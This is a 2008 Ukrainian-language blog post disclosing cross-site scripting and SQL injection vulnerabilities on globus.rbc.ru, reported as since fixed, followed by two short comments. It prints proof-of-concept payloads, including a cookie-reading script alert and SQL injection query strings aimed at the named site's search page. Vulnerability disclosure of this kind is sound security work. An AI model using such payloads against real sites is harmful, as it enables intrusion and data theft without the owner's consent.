Уразливості на globus.rbc.ru

19:42 09.05.2008

19.01.2008

У червні, 19.06.2007, я знайшов Cross-Site Scripting, SQL DB Structure Extraction та SQL Injection уразливості на http://globus.rbc.ru (Global Base of Universal Statistics) - проекті компанії РБК. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на сайтах РБК.

Детальна інформація про уразливості з’явиться пізніше.

09.05.2008

XSS:

alert(document.cookie)

SQL DB Structure Extraction:

http://globus.rbc.ru/rbc/quote_search.html?query=’

SQL Injection:

http://globus.rbc.ru/rbc/quote_search.html?query=1′/**/or/**/1=1)/*

Дані уразливості вже виправлені. Варто лише не забувати дякувати людям, що піклуються про вашу безпеку, як це звичайно трапляється у РБК.

This entry was posted on 19:42 09.05.2008 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.

2 відповідей на “Уразливості на globus.rbc.ru”

a.komlev каже:
Вівторок, 21:16 22.01.2008
http://fuzzing.ru/blog/2008/01/22/rbc_ru_vuln/
MustLive каже:
Вівторок, 02:35 29.01.2008
Спасибо, Александр, за информацию. Особо интересна Source code disclosure / SSI Injection уязвимость на rbc.ru.

You must be logged in to post a comment.

Websecurity - Веб безпека

Уразливості на globus.rbc.ru

2 відповідей на “Уразливості на globus.rbc.ru”

Leave a Reply

Меню

Категорії

Останні повідомлення

Архів +-

Мета